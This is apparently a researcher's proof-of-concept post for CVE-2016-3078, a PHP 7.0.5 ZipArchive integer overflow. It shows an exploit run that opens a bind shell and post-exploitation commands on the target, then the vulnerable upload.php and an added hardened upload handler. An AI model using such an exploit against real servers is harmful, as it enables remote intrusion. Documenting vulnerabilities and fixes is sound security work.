Hans Jerry Illikainen

CVE-2016-3078: php 7.0.5: integer overflow in ZipArchive::getFrom*

Apr 28, 2016

PoC for CVE-2016-3078 targeting Arch Linux i686 running php-fpm 7.0.5 behind nginx.

$ python exploit.py --bind-port 5555 http://1.2.3.4/upload.php
[*] this may take a while
[*] 103 of 4096 (0x67fd0)...
[+] connected to 1.2.3.4:5555

id
uid=33(http) gid=33(http) groups=33(http)

uname -a
Linux arch32 4.5.1-1-ARCH #1 SMP PREEMPT Thu Apr 14 19:36:01 CEST 2016 i686 GNU/Linux

pacman -Qs php-fpm
local/php-fpm 7.0.5-2
    FastCGI Process Manager for PHP

cat upload.php
<?php
$zip = new ZipArchive();
if ($zip->open($_FILES["file"]["tmp_name"]) !== TRUE) {
    echo "cannot open archive\n";
} else {
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $data = $zip->getFromIndex($i);
    }
    $zip->close();
}
?>
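The upload.php above hands every entry of an untrusted archive straight to getFromIndex(), which is the path this PoC reaches. The fix for CVE-2016-3078 is the PHP 7.0.6 release; the handler below is an added example (not code from the original post) of how the same upload endpoint can treat the archive's own metadata as untrusted input: it refuses to run on affected interpreters, bounds the number of entries, and checks the uncompressed size each entry declares in the central directory against a cap before anything is read. MAX_ENTRY_SIZE, MAX_ENTRIES and the extract_entries() function are names chosen for this example.

```php
<?php
// Hardened counterpart of upload.php (added example, not the original post's code).
// Assumption: the 8 MiB per-entry cap and the 1000-entry limit are deployment
// choices for this example, not values from the original post.
const MAX_ENTRY_SIZE = 8 * 1024 * 1024;
const MAX_ENTRIES    = 1000;

// Refuse to serve uploads on an interpreter that predates the 7.0.6 fix.
if (PHP_VERSION_ID < 70006) {
    http_response_code(503);
    exit("php " . PHP_VERSION . " is affected by CVE-2016-3078; upgrade to 7.0.6 or later\n");
}

/**
 * Read every entry of $path into memory, rejecting the archive outright if
 * any entry's declared uncompressed size is larger than MAX_ENTRY_SIZE.
 * The size comes from the central directory, i.e. from the uploader, so it is
 * checked before getFromIndex() is allowed to act on it.
 */
function extract_entries(string $path): array
{
    $zip = new ZipArchive();
    // CHECKCONS asks libzip to run its consistency checks on open.
    if ($zip->open($path, ZipArchive::CHECKCONS) !== TRUE) {
        throw new RuntimeException("cannot open archive");
    }

    if ($zip->numFiles > MAX_ENTRIES) {
        $zip->close();
        throw new RuntimeException("too many entries: " . $zip->numFiles);
    }

    $entries = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $st = $zip->statIndex($i);
        if ($st === false) {
            $zip->close();
            throw new RuntimeException("cannot stat entry $i");
        }
        // Declared size is attacker-controlled: bound it before reading.
        if ($st['size'] < 0 || $st['size'] > MAX_ENTRY_SIZE) {
            $zip->close();
            throw new RuntimeException(sprintf(
                "entry %d (%s) declares %d bytes, cap is %d",
                $i, $st['name'], $st['size'], MAX_ENTRY_SIZE
            ));
        }
        // Pass the now-validated length explicitly rather than 0 ("whole entry").
        $data = $zip->getFromIndex($i, (int) $st['size']);
        if ($data === false) {
            $zip->close();
            throw new RuntimeException("cannot read entry $i");
        }
        $entries[$st['name']] = $data;
    }
    $zip->close();
    return $entries;
}

// Request handling: only accept a file that actually arrived via HTTP upload.
if (!isset($_FILES["file"])
    || $_FILES["file"]["error"] !== UPLOAD_ERR_OK
    || !is_uploaded_file($_FILES["file"]["tmp_name"])) {
    http_response_code(400);
    exit("no upload\n");
}

try {
    $entries = extract_entries($_FILES["file"]["tmp_name"]);
    printf("read %d entries\n", count($entries));
} catch (RuntimeException $e) {
    http_response_code(400);
    echo $e->getMessage(), "\n";
}
?>
```

The per-entry cap is defence in depth for the handler, not a substitute for the interpreter upgrade: an archive whose entry claims a multi-gigabyte uncompressed size is rejected at statIndex() time and never reaches getFromIndex(), and the explicit length argument keeps the read bounded to the value that was just validated.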